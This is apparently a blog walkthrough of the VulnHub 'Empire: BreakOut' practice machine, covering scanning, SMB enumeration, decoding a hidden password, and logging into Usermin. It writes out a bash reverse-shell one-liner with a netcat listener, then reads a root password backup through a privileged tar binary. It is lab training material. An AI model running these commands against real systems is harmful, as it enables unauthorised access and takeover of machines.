Empire: BreakOut || VulnHub Complete Walkthrough

From my previous article, we have completed the first vulnerable box of the Empire series. 


Empire: LupinOne: 

Empire: LupinOne - VulnHub Complete Walkthrough

This detailed walkthrough on CyberSec Mastery explores how to complete the LupinOne VM from VulnHub. LupinOne is a beginner-friendly vulnerable machine aimed at testing and improving your penetration testing skills. The walkthrough covers the enumeration, exploitation, and post-exploitation phases, providing step-by-step instructions to gain root access and successfully complete the challenge.


Empire Breakout is a vulnerable machine with a difficulty-level easy machine designed by  icex64 and  Empire Cybersecurity.



Settings Up

Firstly, we have to download the zip file from VulnHub. 

On completion, launch VirtualBox

Before creating new VMs, we have to extract the downloaded file.

To create a new Virtual Machine click on New.

Fill in the name, type, and version:

Click Next, choose the size of memory, and then browse the .vmdk file from the extracted directory.

On completion, Check if the Network Adapter is set to Host-only adapter, or not.

Once you are done with the settings up, let’s START the instance VMs.

The instance is ready, and we have a terminal screen that prompts us to input the password.


Enumeration

Our First step is to find out the target IP address using NetDiscover.

┌─[mrdev@TS]─[~]
└──╼ $ sudo netdiscover -i vboxnet0

2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                   
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:0b:b2:b7      1      42  PCS Systemtechnik GmbH                                                          
  192.168.56.115  08:00:27:31:e2:16      1      60  PCS Systemtechnik GmbH  

From the Scanning, we have discovered our target IP address which is 192.168.56.108.

We have discovered the IP address, so let's perform a network scan to detect what ports are open is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool:


Conducting Network Scans with Nmap

  • -p- : select all open ports
  • -A : Enable OS detection, version detection, script scanning, and traceroute
  • -T : To specify the time.        

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ sudo nmap -p- -A -T 4 192.168.56.115
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-12 19:29 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.115
Host is up (0.0029s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
|_http-title: 200 — Document follows
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
|_http-title: 200 — Document follows
MAC Address: 08:00:27:31:E2:16 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/12%OT=80%CT=1%CU=31229%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=6207BDE7%P=x86_64-pc-linux-gnu)SEQ(SP=F8%GCD=1%ISR=F8%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F
OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Network Distance: 1 hop

Host script results:
|_clock-skew: -2s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2022-02-12T14:01:43
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   2.92 ms 192.168.56.115

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.86 seconds
┌─[mrdev@TS]─[~]
└──╼ $

From the Nmap output, we have spotted five open ports.

  • Port 80/TCP running an HTTP service, which indicates that there might be a website running.
  • Port 139/TCP and 445/TCP both share the same service NetBios SSN.
  • Port 10000/TCP and 20000/TCP are both running HTTP services.


Web Enumeration

Let’s look at the contents ourselves, we can open a web browser of our choice, and navigate to the target's IP address in the URL bar at the top of the window.

From the output, we have noticed that the running website is a default page of the Apache 2 HTTP service. Nothing seems to be of interest here, so, let’s take a look at the content of the other two Ports.

The running webpage shows a login form to log in to Webmin. If we have valid credentials, then we can manage to get login access and a foothold on the server.


Foothold

From the Nmap scan, we have spotted two open ports running the NetBIOS-SSN service. 

139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2

I have a write-up similar to this Port, where I have managed to hack the server. 

If you have not read that article, click here: 

Exploiting SMB (Samba) - Port 139 and Port 445

This article on CyberSec Mastery delves into the exploitation of SMB (Server Message Block) services running on ports 139 and 445. SMB is a network protocol used for sharing files, printers, and other resources between nodes on a network. The post explores various SMB vulnerabilities and provides insights into how attackers can exploit them to gain unauthorized access, execute arbitrary code, or perform other malicious activities.


Enumerating SMB (Samba) with enum4linux

Let’s enumerate the SMB shares using enum4linux. It is basically a wrapper around the tools in the Samba package and makes it easy to quickly extract information from the target about SMB.

┌─[mrdev@TS]─[~]
└──╼ $ enum4linux -a 192.168.56.115
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Feb 12 19:53:03 2022

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.56.115
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.56.115    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.56.115    |
 ============================================== 
Looking up status of 192.168.56.115
BREAKOUT        <00> -         B <ACTIVE>  Workstation Service
BREAKOUT        <03> -         B <ACTIVE>  Messenger Service
BREAKOUT        <20> -         B <ACTIVE>  File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

MAC Address = 00-00-00-00-00-00

 ======================================= 
|    Session Check on 192.168.56.115    |
 ======================================= 
[+] Server 192.168.56.115 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.56.115    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================== 
|    OS information on 192.168.56.115    |
 ======================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.56.115 from smbclient: 
[+] Got OS info for 192.168.56.115 from srvinfo:
BREAKOUT       Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian
platform_id     : 500
os version      : 6.1
server type     : 0x809a03

 =============================== 
|    Users on 192.168.56.115    |
 =============================== 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 =========================================== 
|    Share Enumeration on 192.168.56.115    |
 =========================================== 

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
IPC$            IPC       IPC Service (Samba 4.13.5-Debian)
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 192.168.56.115
//192.168.56.115/print$ Mapping: DENIED, Listing: N/A
//192.168.56.115/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ====================================================== 
|    Password Policy Information for 192.168.56.115    |
 ====================================================== 


[+] Attaching to 192.168.56.115 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

[+] BREAKOUT
[+] Builtin

[+] Password Info for Domain: BREAKOUT

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes 
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes 
[+] Locked Account Duration: 30 minutes 
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ================================ 
|    Groups on 192.168.56.115    |
 ================================ 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ========================================================================= 
|    Users on 192.168.56.115 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1683874020-4104641535-3793993001
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-500 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
<more>
S-1-5-21-1683874020-4104641535-3793993001-512 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
S-1-5-21-1683874020-4104641535-3793993001-514 *unknown*\*unknown* (8)
<more>
S-1-5-21-1683874020-4104641535-3793993001-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
<more>
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
<more>

 =============================================== 
|    Getting printer info for 192.168.56.115    |
 =============================================== 
No printers returned.


enum4linux complete on Sat Feb 12 19:54:11 2022

┌─[mrdev@TS]─[~]
└──╼ $

From the output, we identified a Local user cyber, which might help us in terms of login with the Webmin. Now we have a username, we only need the password to get the login access.

If you take a look at the page source code of the Apache2 Debian default page, then you will find an encrypted message. 

The encrypted ciphertext seems to be in the form of a brain fuck algorithm


Decryption of Encrypted Brainfuck Cipher Text

Open the browser and search for the brain fuck decoder. Paste here the ciphertext and execute it. 

On successful execution, you will spot a password.


Establishing Reverse Shell Access Through Usermin Webmail Interface

Now, we have a valid username and password, so let’s try to log in with the web portal of Port 20000.

Before Login
After Login

The login was successful and displayed with the ‘Usermin’ application dashboard.

Run Command Shell from USERMIN Dashboard >> Login >> Command Shell.

Next, run the ls command to list the files and the directory's contents. As a result, we found the user.txt. Open this using the cat command.

Let’s create a Bash reverse shell: 

bash -i >& /dev/tcp/ <LPORT> /4242 0>&1

Before running this script, you have turned on the Netcat listener on the port that you mentioned:

┌─[mrdev@TS]─[~]
└──╼ $ nc -lvnp 4242
listening on [any] 4242 ...

On Successful execution, you will be found that reverse shell on Port 4242.

┌─[mrdev@TS]─[~]
└──╼ $nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.115] 51532
bash: cannot set terminal process group (1615): Inappropriate ioctl for device
bash: no job control in this shell
cyber@breakout:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
cyber@breakout:~$ export TERM=xterm
export TERM=xterm
cyber@breakout:~$ 

Since this is not the root user, let’s identify further information about the target machine, which could be useful for gaining root access.


Privilege Escalation

Let's identify the rights, and privileges of the current user by executing the sudo -l command:

cyber@breakout:~$ sudo -l
bash: sudo: command not found

This error means the sudo command-line utility is not installed. 


Directory Traversal and Password Extraction Privilege Escalation

As we have no rights, we cannot install it. Now, we can only way to escalate the Privilege locally.

cyber@breakout:~$ ls -al
ls -al
total 568
drwxr-xr-x  8 cyber cyber   4096 Feb 12 09:39 .
drwxr-xr-x  3 root  root    4096 Oct 19 08:24 ..
-rw-------  1 cyber cyber      0 Oct 20 07:52 .bash_history
-rw-r--r--  1 cyber cyber    220 Oct 19 08:24 .bash_logout
-rw-r--r--  1 cyber cyber   3526 Oct 19 08:24 .bashrc
drwxr-xr-x  2 cyber cyber   4096 Oct 19 14:06 .filemin
drwx------  2 cyber cyber   4096 Oct 19 14:00 .gnupg
drwxr-xr-x  3 cyber cyber   4096 Oct 19 14:29 .local
-rw-r--r--  1 cyber cyber    807 Oct 19 08:24 .profile
drwx------  2 cyber cyber   4096 Oct 19 13:59 .spamassassin
-rwxr-xr-x  1 root  root  531928 Oct 19 15:40 tar
drwxr-xr-x  2 cyber cyber   4096 Oct 20 07:52 .tmp
drwx------ 17 cyber cyber   4096 Feb 12 09:25 .usermin
-rw-r--r--  1 cyber cyber     48 Oct 19 14:31 user.txt
cyber@breakout:~$

As our instance running HTTP Servers, there might be some clue, so let’s take a look at the files and directories of the /var directory. Notice, that there is a backups directory listed in this same directory, so take a look at the content of the /backups directory.

cyber@breakout:~$ ls /var
ls /var
backups  lib    lock  mail  run    tmp      webmin
cache    local  log   opt   spool  usermin  www
cyber@breakout:~$ ls -al /var/backups
ls -al /var/backups
total 28
drwxr-xr-x  2 root root  4096 Feb 12 09:21 .
drwxr-xr-x 14 root root  4096 Oct 19 13:48 ..
-rw-r--r--  1 root root 12732 Oct 19 15:56 apt.extended_states.0
-rw-------  1 root root    17 Oct 20 07:49 .old_pass.bak
cyber@breakout:~$

As we have no privilege to read the content of the old_pass.bak file. 

If you take a look at the files and directories of the current directory previously, you will have noticed a tar file, which has root permission to read, write, and execute.

-rwxr-xr-x  1 root  root  531928 Oct 19 15:40 tar

What is tar?

Tar is a computer software utility for collecting many files into one archive file, often referred to as a tarball, for distribution or backup purposes.


Let's create an archive file called backup.tar file. Click on  tar .

cyber@breakout:~$ ./tar -cf backup.tar /var/backups/.old_pass.bak
./tar -cf backup.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
cyber@breakout:~$ ls
ls
backup.tar   tar  user.txt
cyber@breakout:~$

On successful execution, you notice a tar archive in the current directory.  Extract the archive and take a look at the content within it. 

cyber@breakout:~$ tar -xf backup.tar
tar -xf backup.tar
cyber@breakout:~$ ls
ls
backup.tar  tar  user.txt  var
cyber@breakout:~$ cd var # Change the directories to .old_pass.bak
cd var
cyber@breakout:~/var$ ls
ls
backups
cyber@breakout:~/var$ cd backups
cd backups
cyber@breakout:~/var/backups$ ls -al
ls -al
total 12
drwxr-xr-x 2 cyber cyber 4096 Feb 12 09:50 .
drwxr-xr-x 3 cyber cyber 4096 Feb 12 09:50 ..
-rw------- 1 cyber cyber   17 Oct 20 07:49 .old_pass.bak
cyber@breakout:~/var/backups$ cat .old_pass.bak
cat .old_pass.bak
Ts&4&YurgtRX(=~h
cyber@breakout:~/var/backups$

From the output, we have spotted a password. So let’s try to log in to the root user. 

cyber@breakout:~/var/backups$ su root
su root
Password: Ts&4&YurgtRX(=~h

root@breakout:/home/cyber/var/backups#

Finally, we have the root shell and verify using the “id” command. 

root@breakout:/home/cyber/var/backups#  id
id
uid=0(root) gid=0(root) groups=0(root)
root@breakout:/home/cyber/var/backups#

It has been proven that it is the root, simply change the directory to the /root path to obtain the root flag.

root@breakout:~# cd /root
cd /root
root@breakout:~# ls
ls
rOOt.txt
root@breakout:~# cat rOOt.txt
cat rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

Author: Icex64 & Empire Cybersecurity
root@breakout:~# 

Congratulation! On completion of both Capture the Flags.

Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!